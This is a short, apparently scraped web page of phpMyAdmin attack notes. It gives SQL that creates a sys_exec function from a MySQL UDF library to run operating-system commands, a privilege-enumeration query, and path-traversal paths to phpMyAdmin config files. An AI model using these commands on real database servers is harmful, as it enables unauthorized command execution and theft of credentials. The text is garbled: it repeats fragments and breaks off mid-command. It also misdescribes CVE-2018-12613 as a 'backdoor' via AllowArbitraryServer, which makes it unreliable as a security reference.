Phpmyadmin Hacktricks | PC TESTED |
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so'; SELECT sys_exec('whoami > /tmp/test.txt'); Check your current privileges:
SELECT grantee, privilege_type FROM information_schema.user_privileges; If you have SUPER , you can change server variables, kill queries, and potentially compromise the entire DB server. CVE-2018-12613 (Authenticated RCE) In phpMyAdmin 4.8.0–4.8.1, a backdoor allows remote code execution via the $cfg['AllowArbitraryServer'] setting. phpmyadmin hacktricks
../../etc/phpmyadmin/config.inc.php ../../var/lib/phpmyadmin/config.inc.php .../config.inc.php Look for: SELECT sys_exec('whoami >
